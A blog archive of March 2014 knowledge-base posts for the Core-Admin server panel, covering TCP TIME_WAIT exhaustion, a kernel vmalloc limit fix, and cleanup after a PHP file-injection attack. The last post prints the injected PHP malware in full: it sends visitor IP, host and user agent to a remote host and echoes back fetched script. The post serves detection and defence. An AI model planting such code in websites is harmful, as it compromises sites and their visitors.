Blog

Archive for March, 2014

KB: 24032014-001: Dealing with TIME WAIT exhaustion (no more TCP connections)


Symptom

You have received a time_wait_checker notification, or, after a review, you find that all services are up and working but cannot accept more connections (even though they should), or some services cannot connect to internal services such as database servers (e.g. MySQL). At the same time, running the following command yields more than 30,000 entries:

>> netstat -n | grep TIME_WAIT | wc -l

Another symptom is that specific services like Squid fail with the following error:

commBind: Cannot bind socket FD 98 to *:0: (98) Address already in use

Affected releases

All releases may suffer this problem. It is not a bug but a resource exhaustion problem.

Background

The problem is triggered when some service creates connections faster than they are released for reuse. After a TCP connection is closed, a waiting period (TIME_WAIT) starts, during which stray packets belonging to the closed connection can still be received without being mixed into a newly created connection with the same address/port combination.

Every time a TCP connection is created, a local port is needed for the local endpoint. This port is taken from the ephemeral port range defined at:

/proc/sys/net/ipv4/ip_local_port_range

If that range is exhausted, no more TCP connections can be created because no ephemeral (local) port is available.
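To see why tens of thousands of TIME_WAIT entries can exhaust the range, compare the TIME_WAIT count against the size of the range itself. The sketch below uses a common Linux default range and the 30,000 figure from above as illustrative values only:

```shell
# Illustrative values: a typical default ip_local_port_range and the
# TIME_WAIT count mentioned above. On a live system, read the range
# from /proc/sys/net/ipv4/ip_local_port_range instead.
low=32768; high=60999
time_wait=30000
available=$((high - low + 1))
echo "ephemeral ports available: $available"
echo "headroom after TIME_WAIT:  $((available - time_wait))"
```

A negative headroom means new outgoing connections will start failing until sockets leave TIME_WAIT.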

There are several ways to solve this problem. The following solutions are listed in recommended order:

  1. Identify the application creating those connections and review whether it has a problem.
  2. If that is not possible, increase the ephemeral port range. See the next section.
  3. If increasing the ephemeral port range does not solve the problem, try reducing the time a connection stays in TIME_WAIT. See the next section.
  4. If that does not solve the problem, try activating the TCP time wait reuse option, which makes the system reuse ports that are in TIME_WAIT. See the next section.
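For step 1, grouping TIME_WAIT sockets by remote endpoint usually reveals the offending service. The pipeline below is demonstrated on a small, hypothetical netstat sample so the example is self-contained; on a live system, feed it `netstat -n` (or `ss -tan`) output instead:

```shell
# Hypothetical `netstat -n` sample; field 5 is the remote endpoint,
# field 6 the TCP state.
sample='tcp 0 0 10.0.0.5:44321 10.0.0.9:3306 TIME_WAIT
tcp 0 0 10.0.0.5:44322 10.0.0.9:3306 TIME_WAIT
tcp 0 0 10.0.0.5:44323 10.0.0.9:80 TIME_WAIT'

# Count TIME_WAIT sockets per remote endpoint, busiest first. A large
# count against e.g. port 3306 points at a service hammering MySQL.
echo "$sample" | awk '$6 == "TIME_WAIT" {print $5}' | sort | uniq -c | sort -rn
```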

Solution

If you cannot fix the application producing this amount of TIME_WAIT connections, use the following options provided by the time_wait_checker to configure the system to react better to this situation.

  1. First, select the machine, then click on "Actions" (at the top-right of the machines' view).
  2. Now, click on "Show machine's checkers".
  3. Then select the "time_wait_checker" and click on "Configure".
  4. After that, a window will be shown where the various TIME_WAIT handling options can be configured.

Now use the available options as described, applying them in the recommended order.

Some notes about TCP time wait reuse and recycle options

A special mention for the TCP time wait recycle option ( /proc/sys/net/ipv4/tcp_tw_recycle ): it is considered more aggressive than TCP time wait reuse ( /proc/sys/net/ipv4/tcp_tw_reuse ). Both can cause problems because they apply "simplifications" to reduce the wait time and to reuse certain structures. Given its nature, tcp_tw_recycle can cause problems with devices behind a NAT, allowing connections seemingly at random (only one device behind the NAT will be able to connect to the server while this option is enabled). As indicated by the tool, "Observe after activation". More information about tcp_tw_recycle and how it relates to NATed devices at http://troy.yort.com/improve-linux-tcp-tw-recycle-man-page-entry/

In general, neither option should be used unless needed.
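For reference, the checker's options correspond to standard kernel parameters. Setting them by hand from a shell would look like the sketch below; the values are illustrative, the commands require root, and on Core-Admin systems the time_wait_checker UI is the supported way to toggle them:

```shell
# Illustrative values only; adjust to your environment. These are the
# same kernel knobs the time_wait_checker exposes through the UI.
sysctl -w net.ipv4.ip_local_port_range="15000 65000"  # widen the ephemeral range
sysctl -w net.ipv4.tcp_fin_timeout=30                 # shorten FIN-related timeouts
sysctl -w net.ipv4.tcp_tw_reuse=1                     # reuse TIME_WAIT sockets; observe after activation
# To persist across reboots, place the equivalent lines in /etc/sysctl.conf.
```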

Long term solutions

The following solutions are not quick and require preparation, but you can consider them to avoid the problem in the long term.

SOLUTION 1: If possible, update your application to reuse the connections it creates. For example, if those connections are internal database connections, instead of creating, querying and closing each time, try to reuse the connection as much as possible. In many cases this greatly reduces the number of pending TIME_WAIT connections.

SOLUTION 2: Another possible solution is to use several IPs for the same service and load-balance across them (for example, via DNS). That expands the set of possible TCP endpoint combinations and thus the number of ephemeral ports available: every additional IP serving the service adds another full range.
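The arithmetic behind SOLUTION 2 is simple: each (local IP, local port) pair is a distinct TCP endpoint, so every extra IP contributes its own full ephemeral range. A small sketch, using a common default range as an illustrative value:

```shell
# Each extra local IP serving the service adds another full ephemeral
# range of usable local endpoints.
low=32768; high=60999           # illustrative default ip_local_port_range
per_ip=$((high - low + 1))
for ips in 1 2 3; do
  echo "$ips IP(s): $((ips * per_ip)) usable local endpoints"
done
```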

In any case, SOLUTION 1 is by far better than SOLUTION 2: it is better to have a service consuming fewer resources.

Posted in: KB, Linux Networking


KB: 19032014-001: Fixing kernel memory allocation problem

Symptom

If, after enabling the firewall, you get the following error:

iptables: Memory allocation problem

Or at the server logs you find the following indications:

vmap allocation for size 9146368 failed: use vmalloc= to increase size.

This means the kernel's internal memory has reached the vmalloc limit.

Affected releases

All Core-Admin releases running a Linux kernel version 2.6.32 or later.

Background

The first step is to check current limit. To that end, run the following:

>> cat /proc/meminfo | grep -i vmalloc
VmallocTotal: 124144 kB
VmallocUsed: 5536 kB
VmallocChunk: 1156 kB

In this example, VmallocTotal tells us we have roughly 128M of vmalloc memory allowed (124144 kB is about 121 MB).
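As a quick sanity check of that reading, the kB figure can be converted to MB (using the example line from the output above):

```shell
# Convert the VmallocTotal figure from the example output to MB.
echo "VmallocTotal: 124144 kB" | awk '{printf "%.0f MB\n", $2 / 1024}'
```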

Given this value, we have to increase it to something bigger, like 256M or 384M (which may be more than needed).

Solution

To update this value we have to pass a parameter to the kernel at boot time.

The exact parameter is vmalloc=256M (set the amount of memory you want). Depending on the boot loader you are using, do the following:

1) LILO: Edit  /etc/lilo.conf to update the append declaration like follows:

image = /boot/vmlinuz
root = /dev/hda1
append = "vmalloc=256M"

2) GRUB 1.0: edit “kopt” variable at /boot/grub/menu.lst to include the declaration. A working example is:

kopt=root=UUID=b530efc1-0b0c-419e-affb-87eb9e18b0dc ro vmalloc=256M

After that, save the file and reload the GRUB configuration. This is usually done with:

>> update-grub

3) GRUB 2.0: edit /etc/default/grub and update the GRUB_CMDLINE_LINUX_DEFAULT variable to include the following declaration:

GRUB_CMDLINE_LINUX_DEFAULT="quiet vmalloc=384M"

After that, you must reload configuration. This is usually done with:

>> update-grub

Posted in: KB


Using Core-Admin to resolve php+# web hacking

After a review you find that several web pages have been updated with code like the following, or perhaps a customer calls you because their web site is being blocked by browsers for including suspicious code like:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

These attacks do not pose any harm to a properly configured server, but they make the affected web pages execute remote chat code or ads, which causes Google Chrome and many other browsers to block those pages for running suspicious code.

Understanding these attacks

The problem with these attacks is that they update original files with "surgical" modifications, making it difficult and annoying to get back to the original state.

One option is to restore from a backup, but newer webs, which use different sorts of caches and generated PHP files, make this hard. It is not possible to recover just by replacing those files: you must get back to a consistent state (for example, the last backup). This implies removing the current web files and restoring from the backup, so backup files don't get mixed with current files that weren't included in the backup.

After this, remember to reset or block all FTP accounts/passwords that were used during the attack.

First line of defense: knowing when the attack happens

Core-Admin gives you this knowledge as the attack happens. After the modification, Core-Admin's file system watching service will report "possible php hash attack found" with an indication like the following:

(Screenshot: Core-Admin detecting a PHP hash attack)

After receiving this notification, you only have to run the following command to find out how many files were modified and how many FTP accounts were compromised. The same command will guide you through recovering the infected files and updating the FTP accounts' passwords.

>> crad-find-and-fix-phphash-attack.pyc

The above command only reports. You can then execute the same command with the following options to fix the files found and to update the FTP accounts:

>> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts
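If you want to double-check by hand which files carry an injected marker, a minimal sketch is shown below. The `#41f893#`-style pattern is an assumption based on the sample above (real markers vary per attack), and the sandbox files exist only to make the example self-contained; prefer the Core-Admin tool for actual cleanup.

```shell
# Build a tiny sandbox with one "infected" and one clean file so the
# search can be demonstrated safely.
tmp=$(mktemp -d)
printf '<?php\n#41f893#\nerror_reporting(0);\n#/41f893#\n?>\n' > "$tmp/index.php"
printf '<?php echo "clean"; ?>\n' > "$tmp/about.php"

# List PHP files carrying a hash-delimited injection marker. The
# six-hex-digit pattern mimics the sample above; adjust as needed.
hits=$(grep -rlE '#[0-9a-f]{6}#' --include='*.php' "$tmp")
echo "$hits"

rm -rf "$tmp"
```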

How did this attack happen?

This attack relies on a network of servers in charge of applying these modifications, together with virus/malware software that infects machines using well-known FTP clients. Here is how the attack develops:

  1. The first part of the attack targets well-known FTP clients that save passwords in known places on the file system.
  2. It is suspected that using public Wi-Fi and insecure networks while opening FTP sessions may be part of the problem too.
  3. After this, your machines get exposed to the virus/malware, which extracts stored FTP accounts and sends them to the servers that will perform the FTP attack.
  4. With this information, the modification servers (that's how we call them) finally carry out the attack using those FTP accounts: downloading the original files, updating them, and uploading them back to their original place.

Important notes about the attack

It is important to understand that the modification servers do not carry out the attack right after receiving compromised FTP passwords. They wait until they have several passwords for the same system, and they also delay the attack to disconnect the two incidents (the web hack and the infection on your computers).

This way, they hope unaware users will not connect the two incidents, which otherwise would trigger an anti-virus scan by the user and stop the information leak.

On the other hand, they also wait until they have several accounts so they can carry out a massive attack, relying on confusion and/or magnitude to increase the likelihood that part of the infection survives.

How can I prevent it?

There are several actions you can take to avoid these attacks:

  1. Try not to save FTP accounts in your FTP client. Instead, store those passwords in an application that protects them with a master password.
  2. Avoid using public Wi-Fi and untrusted shared connections (like hotels') to connect to your FTP servers.
  3. If possible, after making FTP modifications, enable read-only mode or disable the FTP account using the Core-Admin panel. This way, even if the password is compromised, no modification will be possible.

Posted in: Core-Admin, Core-Admin Web Edition, PHP, Security
